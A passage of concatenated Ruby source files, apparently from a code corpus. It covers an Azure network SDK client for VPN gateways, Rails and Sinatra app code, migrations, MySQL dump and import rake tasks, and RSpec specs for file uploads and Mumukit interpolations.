path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def begin_create_or_update(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) response = begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! response.body unless response.nil? end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def begin_create_or_update_with_http_info(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. 
# @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, 'vpn_gateway_parameters is nil' if vpn_gateway_parameters.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() request_content = @client.serialize(request_mapper, vpn_gateway_parameters) request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:put, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 201 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end # Deserialize Response if status_code == 201 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. 
# @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # def begin_delete(resource_group_name, gateway_name, custom_headers:nil) response = begin_delete_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! nil end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def begin_delete_with_http_info(resource_group_name, gateway_name, custom_headers:nil) begin_delete_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def begin_delete_async(resource_group_name, gateway_name, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:delete, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 202 || status_code == 204 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? result end promise.execute end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. 
# @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def begin_reset(resource_group_name, gateway_name, custom_headers:nil) response = begin_reset_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def begin_reset_with_http_info(resource_group_name, gateway_name, custom_headers:nil) begin_reset_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def begin_reset_async(resource_group_name, gateway_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:post, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 202 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? 
nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a resource group. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] operation results. # def list_by_resource_group_next(next_page_link, custom_headers:nil) response = list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value! response.body unless response.nil? end # # Lists all the VpnGateways in a resource group. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_resource_group_next_with_http_info(next_page_link, custom_headers:nil) list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a resource group. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_resource_group_next_async(next_page_link, custom_headers:nil) fail ArgumentError, 'next_page_link is nil' if next_page_link.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = '{nextLink}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], skip_encoding_path_params: {'nextLink' => next_page_link}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? 
nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a subscription. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] operation results. # def list_next(next_page_link, custom_headers:nil) response = list_next_async(next_page_link, custom_headers:custom_headers).value! response.body unless response.nil? end # # Lists all the VpnGateways in a subscription. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_next_with_http_info(next_page_link, custom_headers:nil) list_next_async(next_page_link, custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a subscription. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_next_async(next_page_link, custom_headers:nil) fail ArgumentError, 'next_page_link is nil' if next_page_link.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = '{nextLink}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], skip_encoding_path_params: {'nextLink' => next_page_link}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? 
nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] which provide lazy access to pages of the # response. # def list_by_resource_group_as_lazy(resource_group_name, custom_headers:nil) response = list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! unless response.nil? page = response.body page.next_method = Proc.new do |next_page_link| list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers) end page end end # # Lists all the VpnGateways in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] which provide lazy access to pages of the # response. # def list_as_lazy(custom_headers:nil) response = list_async(custom_headers:custom_headers).value! unless response.nil? page = response.body page.next_method = Proc.new do |next_page_link| list_next_async(next_page_link, custom_headers:custom_headers) end page end end end end
43.140596
149
0.698724
4a76ecaae0e16de7f47e5e0e0e421fb04e23a10c
398
require 'thor' require 'shopware/api/client' require 'shopware/cli/config' require 'shopware/cli/shell' module Shopware module CLI module Subcommands class Subcommand < Thor attr_reader :client include Config include Shell def initialize(*args) super @client = API::Client.new options.api end end end end end
15.92
47
0.623116
33747776a25c9fa8cf4424f3fa154e506d37296d
1,291
#-- copyright # ReportingEngine # # Copyright (C) 2010 - 2014 the OpenProject Foundation (OPF) # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # version 3. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. #++ class Widget2::Controls::QueryName < Widget2::Controls dont_cache! # The name might change, but the query stays the same... def render options = { id: 'query_saved_name', 'data-translations' => translations } if @subject.new_record? name = l(:label_new_report_target) icon = '' else name = @subject.name options['data-is_public'] = @subject.public? options['data-is_new'] = @subject.new_record? end write(content_tag(:span, h(name), options) + icon.to_s) end def translations { isPublic: l(:field_is_public) }.to_json end end
32.275
81
0.711851
ff02ee0deb321d0886a837add5dfa2b2d8d313b7
280
class Admin::BaseController < ApplicationController before_action :authorize_admin! private def authorize_admin! return true if current_user && current_user.admin? flash[:alert] = "You are not permitted to access that." redirect_to root_url end end
21.538462
59
0.728571
26eee1c045c760940e1ccb37ef3ebf3064714a12
2,319
require 'rubygems' require 'thor' require 'yaml' require 'json' require 'launchy' require 'progress_bar' require 'screenshot' require "screenshooter/version" # Should get the values from the .browserstack file def get_credentials if ENV['BROWSERSTACK_USERNAME'] and ENV['BROWSERSTACK_TOKEN'] [ENV['BROWSERSTACK_USERNAME'], ENV['BROWSERSTACK_TOKEN']] else keypair = File.open("#{Dir.home}/.browserstack", &:readline) keypair.strip.split(":") end end module ScreenShooter class ShotMaster < Thor desc "list", "list systems" def list username, password = get_credentials client = Screenshot::Client.new({"username" => username, "password" => password}) puts client.get_os_and_browsers end desc "shoot", "take a screenshot" method_option :url, :aliases => "-u", :desc => "URL of page to screenshot" method_option :wait, :type => :boolean, :aliases => "-w", :default => false, :desc => "Wait for screenshots to be rendered?" method_option :open, :type => :boolean, :aliases => "-o", :default => false, :desc => "Open the URL in the browser?" method_option :quiet, :type => :boolean, :aliases => "-q", :default => false, :desc => "Don't show progress bar" def shoot(file="browsers.yaml") username, password = get_credentials client = Screenshot::Client.new({"username" => username, "password" => password}) file_extension = file.split('.')[-1] if file_extension == 'yaml' params = YAML::load( File.open( file ) ) elsif file_extension == 'json' params = JSON.parse( File.read(file) ) end if options.has_key? "url" params["url"] = options["url"] end begin request_id = client.generate_screenshots params rescue Exception => e puts e.message end shot_status = "pending" bar = ProgressBar.new(:elapsed) unless options[:quiet] begin shot_status = client.screenshots_status request_id sleep 2.5 bar.increment! unless options[:quiet] end while options["wait"] and shot_status != "done" screenshots_url = "http://www.browserstack.com/screenshots/#{request_id}" if options["open"] Launchy.open(screenshots_url) else puts screenshots_url end end end end
32.661972
128
0.648124
ab202e19b23e0b12620bd34f319e45b0d77ddc88
23
puts "Hello, world!"
5.75
20
0.608696
012a98e6c58652951df8db925f29e0ad0ff0d609
1,274
class CreateLeads < ActiveRecord::Migration[4.2] def self.up create_table :leads, force: true do |t| t.string :uuid, limit: 36 t.references :user t.references :campaign t.integer :assigned_to t.string :first_name, limit: 64, null: false, default: "" t.string :last_name, limit: 64, null: false, default: "" t.string :access, limit: 8, default: "Public" t.string :title, limit: 64 t.string :company, limit: 64 t.string :source, limit: 32 t.string :status, limit: 32 t.string :referred_by, limit: 64 t.string :email, limit: 64 t.string :alt_email, limit: 64 t.string :phone, limit: 32 t.string :mobile, limit: 32 t.string :blog, limit: 128 t.string :linkedin, limit: 128 t.string :facebook, limit: 128 t.string :twitter, limit: 128 t.string :address t.integer :rating, null: false, default: 0 t.boolean :do_not_call, null: false, default: false t.datetime :deleted_at t.timestamps end add_index :leads, %i[user_id last_name deleted_at], unique: true add_index :leads, :assigned_to end def self.down drop_table :leads end end
32.666667
68
0.597331
b90c77f6b6094d35012847eded3a251b3db7d75b
512
# Same as /sessions/new get '/login' do erb :'/users/login' end # Same as post /sessions post '/login' do user = User.find_by(username: params[:user][:username]) password = params[:user][:password] if user && User.authenticate(params[:user][:username], password) session[:user_id] = user.id redirect "/" else redirect '/login' end end # Same as delete /sessions/:id get '/logout' do session.clear redirect '/' end # Alias for /login get '/sessions/new' do redirect '/login' end
17.655172
66
0.662109
e2a5e853ce8356fa79909566bbbde9e9f756b3ed
758
class Baza::InfoActiveRecordMysql attr_reader :db def self.connection require "active_record" require "activerecord-jdbc-adapter" if RUBY_PLATFORM == "java" @conn_pool ||= ::ActiveRecord::Base.establish_connection( adapter: "mysql", host: "localhost", database: "baza-test", username: "baza-test", password: "password" ) @conn ||= @conn_pool.connection {pool: @conn_pool, conn: @conn} end def initialize(args = {}) data = Baza::InfoActiveRecordMysql.connection data.fetch(:conn).reconnect! @db = Baza::Db.new({ type: :active_record, conn: data.fetch(:conn) }.merge(args)) end def before @db.tables.list(&:drop) end def after @db.close end end
19.947368
66
0.630607
4af832e3febf6df26c0a368d7836c4a87ddf3f85
1,267
namespace :webmasters_cms do desc "dump a rails database" task :dump_db, [:out_file] => [:environment] do |t, args| if db_config = ActiveRecord::Base.configurations[Rails.env] db_name = db_config['database'] out_file = args[:out_file] || "/tmp/#{Time.now.strftime("%Y_%m_%d")}__#{db_name}.sql" p "Dumping #{db_name} to #{out_file}" command = ['mysqldump'] command << '-u' command << db_config['username'] command << "-p#{db_config['password']}" unless db_config['password'].blank? command << db_name command << '>' command << out_file system command.join(' ') end end desc "import a rails database dump" task :import_db_dump, [:import_file] => ["db:drop", "db:create", :environment] do |t, args| if db_config = ActiveRecord::Base.configurations[Rails.env] db_name = db_config['database'] import_file = args[:import_file] p "Importing #{import_file} to #{db_name}" command = ['mysql'] command << '-u' command << db_config['username'] command << "-p#{db_config['password']}" unless db_config['password'].blank? command << db_name command << '<' command << import_file system command.join(' ') end end end
32.487179
93
0.61326
086cc29f5e7b907dba218b1f3c50573a5457aa90
75
FactoryGirl.define do factory :comment do comment "MyText" end end
12.5
21
0.72
ed8e0332f49a6c3d1f6718f1afed9b73b1055230
285
class CreateReviews < ActiveRecord::Migration[5.1] def change create_table :reviews do |t| t.belongs_to :user, index: true t.belongs_to :instrument, index: true t.column :title, :string t.column :content, :string t.timestamps end end end
23.75
50
0.645614
d5c14c36445c09bcbb7917f8958a63dd38b109f0
121
class AddAvatarToAtractivo < ActiveRecord::Migration def change add_column :atractivos, :avatar, :string end end
20.166667
52
0.768595
bf82e065db5d9bde3675595cce5edf227c846c30
584
# Note that for simplicity's sake this is not thread-safe class SqlMonitor def initialize reset end def start(name, id, payload) return if %w(CACHE SCHEMA).include?(payload[:name]) @last_start = Time.now end def finish(name, id, payload) return if %w(CACHE SCHEMA).include?(payload[:name]) @queries << { sql: payload[:sql], duration_ms: (Time.now - @last_start) * 1000 } end def reset ret = @queries @queries = [] ret end end SQL_MONITOR = SqlMonitor.new ActiveSupport::Notifications.subscribe('sql.active_record', SQL_MONITOR)
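# Hedged usage sketch: with the monitor above subscribed (e.g. from a Rails
# initializer), the entries collected for 'sql.active_record' can be drained per
# request or test via #reset, which returns the buffered {sql:, duration_ms:}
# hashes and clears the buffer. Rails.logger stands in for any output sink.
queries = SQL_MONITOR.reset
queries.each do |q|
  Rails.logger.info format('%.1fms  %s', q[:duration_ms], q[:sql])
end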
19.466667
84
0.67637
e8a0646c05d70bf00c6c3c5166ac24d96d46c8b8
4,968
require 'spec_helper' describe "gws_share_files_upload_policy", type: :feature, dbscope: :example, js: true do let(:site) { gws_site } let!(:folder) { create :gws_share_folder } let!(:category) { create :gws_share_category } context "sanitizer setting" do before { login_gws_user } before do upload_policy_before_settings('sanitizer') end after do upload_policy_after_settings end it do visit gws_share_files_path(site) click_on folder.name # create click_on I18n.t("ss.links.new") click_on I18n.t("gws.apis.categories.index") wait_for_cbox do click_on category.name end within "form#item-form #addon-basic" do wait_cbox_open do click_on I18n.t('ss.buttons.upload') end end wait_for_cbox do attach_file "item[in_files][]", "#{Rails.root}/spec/fixtures/ss/file/keyvisual.jpg" click_button I18n.t("ss.buttons.save") end expect(page).to have_css('.file-view', text: 'keyvisual.jpg') expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) wait_cbox_close do click_on "keyvisual.jpg" end within '#selected-files' do expect(page).to have_css('.name', text: 'keyvisual.jpg') expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) end within "form#item-form" do fill_in "item[memo]", with: "new test" end within "footer.send" do click_on I18n.t('ss.buttons.upload') end expect(page).to have_css('#notice', text: I18n.t('ss.notice.saved')) within '.list-items' do expect(page).to have_content('keyvisual.jpg') expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) end file = Gws::Share::File.all.first expect(file.sanitizer_state).to eq 'wait' expect(Fs.exists?(file.path)).to be_truthy expect(Fs.exists?(file.sanitizer_input_path)).to be_truthy expect(Fs.cmp(file.path, file.sanitizer_input_path)).to be_truthy # show click_on file.name expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) # restore output_path = sanitizer_mock_restore(file) expect(file.sanitizer_state).to eq 'complete' expect(Fs.exists?(file.path)).to be_truthy expect(Fs.exists?(output_path)).to be_falsey click_on I18n.t('ss.links.back_to_index') expect(page).to have_css('.list-items .sanitizer-complete') click_on file.name expect(page).to have_css('.sanitizer-complete') # update click_on I18n.t("ss.links.edit") within "form#item-form" do attach_file "item[in_file]", "#{Rails.root}/spec/fixtures/ss/file/keyvisual.jpg" fill_in "item[name]", with: "modify" click_button I18n.t('ss.buttons.save') end expect(page).to have_css('#notice', text: I18n.t('ss.notice.saved')) expect(page).to have_css('.sanitizer-wait', text: I18n.t('ss.options.sanitizer_state.wait')) file.reload file_path = file.path sanitizer_input_path = file.sanitizer_input_path expect(Fs.cmp(file.path, file.sanitizer_input_path)).to be_truthy # soft delete click_on I18n.t("ss.links.delete") within "form" do click_on I18n.t("ss.buttons.delete") end expect(page).to have_css('#notice', text: I18n.t('ss.notice.deleted')) # hard delete visit gws_share_files_path(site) click_on I18n.t("ss.links.trash") click_on folder.name click_on file.name click_on I18n.t("ss.links.delete") within "form" do click_on I18n.t("ss.buttons.delete") end expect(page).to have_css('#notice', text: I18n.t('ss.notice.deleted')) expect(Fs.exists?(file_path)).to be_falsey expect(Fs.exists?(sanitizer_input_path)).to be_falsey end end context "restricted setting" do before { login_gws_user } before do upload_policy_before_settings('sanitizer') site.set(upload_policy: 'restricted') end 
after do upload_policy_after_settings end it do visit gws_share_files_path(site) click_on folder.name # create click_on I18n.t("ss.links.new") click_on I18n.t("gws.apis.categories.index") wait_for_cbox do click_on category.name end within "form#item-form #addon-basic" do wait_cbox_open do click_on I18n.t('ss.buttons.upload') end end wait_for_cbox do attach_file "item[in_files][]", "#{Rails.root}/spec/fixtures/ss/file/keyvisual.jpg" click_button I18n.t("ss.buttons.save") end page.accept_alert do expect(page).to have_no_css('.file-view') end expect(Gws::Share::File.all.count).to eq 0 end end end
31.443038
100
0.646135
38c26b143c7fbcbfb7995a5c2998076d64d8d338
79
class Collection < ApplicationRecord belongs_to :user belongs_to :show end
15.8
36
0.797468
117ac12d105770e0be0df4ddcc025606ee7855ef
3,010
require_relative '../spec_helper' describe 'interpolations' do describe 'interpolate' do let(:i) { Mumukit::Directives::Interpolations.new } it { expect(i.interpolations? '').to be false } it { expect(i.interpolations? 'test "foo" {}').to be false } it { expect(i.interpolations? 'test "foo" { /* here there is a test */ }').to be false } it { expect(i.interpolations? 'test "foo" { /**/ }').to be false } it { expect(i.interpolations? 'test "foo" { /*......*/ }').to be false } it { expect(i.interpolations? 'test "foo" { /*...foo...*/ }').to be true } it { expect(i.interpolate 'foo', {}).to eq ['foo', []] } it { expect(i.interpolate 'foo', {'bar' => 'lalala'}).to eq ['foo', []] } it { expect(i.interpolate 'foo /*...foo...*/', {'bar' => 'lalala'}).to eq ['foo /*...foo...*/', []] } it { expect(i.interpolate 'foo /*...bar...*/', {'bar' => 'lalala'}).to eq ['foo lalala', ['bar']] } it { expect(i.interpolate 'foo /*...bar...*/ /*...bar...*/', {'bar' => 'lalala'}).to eq ['foo lalala lalala', ['bar']] } it { expect(i.interpolate 'foo /*...foo...*/ /*...bar...*/', {}).to eq ['foo /*...foo...*/ /*...bar...*/', []] } it { expect(i.interpolate 'foo /*...baz...*/ /*...bar...*/', {'bar' => 'lalala', 'baz' => 'lelele'}).to eq ['foo lelele lalala', ['baz', 'bar']] } it { expect(i.interpolate 'foo /*...previousContent...*/ /*...bar...*/', lambda { |key| 'lalala' }).to eq ['foo lalala lalala', ['previousContent', 'bar']] } it { expect(i.interpolate 'foo /*...previousContent...*/ /*...bar...*/', lambda { |key| 'lalala' if key == 'previousContent' }).to eq ['foo lalala /*...bar...*/', ['previousContent']] } end describe 'transform' do let(:i) { Mumukit::Directives::Interpolations.new('test') } it { expect(i.transform('test' => 'baz', 'extra' => 'bar', 'content' => 'foo')).to eq 'test' => 